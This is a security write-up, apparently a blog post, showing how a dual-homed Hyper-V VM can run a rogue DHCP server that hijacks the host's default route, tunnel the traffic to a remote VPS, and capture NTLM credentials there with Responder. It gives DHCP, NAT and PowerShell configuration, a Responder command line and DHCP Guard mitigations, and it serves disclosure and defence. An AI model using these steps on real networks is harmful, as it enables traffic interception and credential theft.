Microsoft has confirmed a mitigation is already in place: in the VM's settings, go to Network Adapter -> Advanced Features -> DHCP Guard and enable it. According to Microsoft, it is not enabled by default because of its performance impact.
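DHCP Guard can also be enabled per-VM from PowerShell on the host; the VM name below is a placeholder:

```powershell
# Enable DHCP Guard on all network adapters of the VM (VM name is an example)
Set-VMNetworkAdapter -VMName "SuspectVM" -DhcpGuard On
```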
I personally use PowerShell to just disable DHCP on the interface, like: `Set-NetIPInterface -InterfaceIndex 2 -Dhcp Disabled`, where ifindex 2 is the host-side adapter for the "Internal" vSwitch type.
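A minimal sketch of that approach, locating the host-side adapter first (the adapter name pattern and ifIndex below are examples):

```powershell
# Find the vEthernet adapter Hyper-V creates on the host for the internal vSwitch
Get-NetAdapter | Where-Object { $_.Name -like "vEthernet (Internal*" }

# Disable DHCP on that interface so a rogue DHCP server in a VM cannot
# push a default route to the host (replace 2 with the actual ifIndex)
Set-NetIPInterface -InterfaceIndex 2 -Dhcp Disabled
```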
The goal of this article is a proof of concept showing how a Hyper-V virtual machine configured with two NICs, one internal and one external (with internet access), can lead to the compromise of a Microsoft domain and the exfiltration of your company's data.
- Windows Server 2012 R2, 2016, or Windows 10 host with Hyper-V.
- VM capable of acting as a DHCP server / NAT gateway. (Tested with OpenBSD and Windows Server 2016.)
- VPN service of some kind compatible with the VM. We used OpenVPN and a private VPS.
A new VM is deployed and handed over to a local administrator, or a VM is compromised from the outside and has this configuration. The VM is given two NICs. One on an external vSwitch giving it outbound internet access, and one connected to an internal switch giving it access to… whatever else it needs access to internally/privately.
This assumes the administrator has not modified the virtual network adapter that gets created on the host itself when the internal vSwitch is created, leaving it set to "Obtain Automatically" for DHCP / DNS settings.
On OpenBSD this was extremely easy. We set up a simple DHCP config to hand out addresses 192.168.10.100-200, statically assigning the internal interface as 192.168.10.1. We used 220.127.116.11 and 18.104.22.168 for DNS, but could just as easily have installed and configured our own DNS service to push to the clients. We enabled IPv4 forwarding via sysctl and applied a very simple pf.conf to handle the NAT. DHCP hands an address to the Hyper-V host on the virtual NIC it creates, and the pushed default route gets a metric of "15" on Windows 10, "5" on Server 2012 R2, and "10" on Server 2016 Standard. Only on 2012 R2 is this metric the same as the host's normal default route. Traffic did eventually start flowing through the new DHCP-pushed route, but it took a little longer.
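The OpenBSD side can be sketched as follows; the interface names (hvn0/hvn1) and the DNS value pushed to clients are assumptions and should be adapted to the actual environment:

```
# /etc/dhcpd.conf -- hand out 192.168.10.100-200 on the internal interface
subnet 192.168.10.0 netmask 255.255.255.0 {
        range 192.168.10.100 192.168.10.200;
        option routers 192.168.10.1;
        # DNS pushed to clients; substitute your own servers here
        option domain-name-servers 192.168.10.1;
}

# enable IPv4 forwarding (persist it in /etc/sysctl.conf)
#   sysctl net.inet.ip.forwarding=1

# /etc/pf.conf -- minimal NAT from the internal network out the external NIC
ext_if = "hvn0"
int_if = "hvn1"
match out on $ext_if from $int_if:network to any nat-to ($ext_if)
pass
```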
On Windows Server 2016 we essentially mimicked this setup using the 192.168.11.0/24 network. We installed the DHCP and Routing and Remote Access roles, then configured the DHCP server settings and NAT through their respective snap-ins. Using PowerShell's Invoke-WebRequest cmdlet, we pulled down a custom-packaged OpenVPN client with certs and configs, installed it, and connected the VPN client to a VPS in the Netherlands.
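On the Windows side, the same DHCP scope and the client-pull step could be scripted roughly like this; the scope name, download URL, and file paths are hypothetical:

```powershell
# Create the rogue 192.168.11.0/24 scope and push ourselves as the gateway
Add-DhcpServerv4Scope -Name "Internal" -StartRange 192.168.11.100 `
    -EndRange 192.168.11.200 -SubnetMask 255.255.255.0
Set-DhcpServerv4OptionValue -Router 192.168.11.1

# Pull down the packaged OpenVPN client with certs/configs (URL is hypothetical)
Invoke-WebRequest -Uri "https://203.0.113.10/openvpn-bundle.zip" `
    -OutFile "C:\Temp\openvpn-bundle.zip"
```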
Once the VPN connection was active, it modified the VM's default route to push all traffic through the VPN gateway. We verified on the Hyper-V host that all traceroutes hit 192.168.11.1 (the Server 2016 VM) first, then 10.69.69.1 (the VPN gateway), then the next hop out of our VPS provider and onward to their destinations across the internet. Other VMs on the host were also affected by this route hijack.
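On the host, the competing default routes and their metrics can be inspected with Get-NetRoute; the DHCP-pushed route is the one whose next hop is the rogue VM:

```powershell
# List all default routes on the host, lowest route metric first --
# the winning route determines where the host's traffic actually goes
Get-NetRoute -DestinationPrefix "0.0.0.0/0" |
    Sort-Object RouteMetric |
    Format-Table ifIndex, NextHop, RouteMetric, InterfaceMetric
```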
To take it a step further, I stood up a Debian Wheezy box as the VPS, ported the OpenVPN server config over to it and got it working, tested all of the above routing, and began installing tools. I stood up a Responder instance and started gathering data, as well as running MITM and session-hijacking attacks against traffic passing through the Debian machine. I was able to capture Windows logon credentials (NTLM) from the affected host and VMs.
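For reference, a Responder instance on the VPS can be pointed at the VPN-facing interface like so (tun0 is an assumed interface name for the OpenVPN server side):

```
# Listen on the OpenVPN tunnel interface and log captured NTLM hashes
# -I = interface, -w = start the rogue WPAD proxy, -v = verbose
python Responder.py -I tun0 -wv
```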
I still want to see how far down the rabbit hole this could go with more tools and attacks on the distant end, but this is the initial write-up of the finding. As I continue testing I will update this article.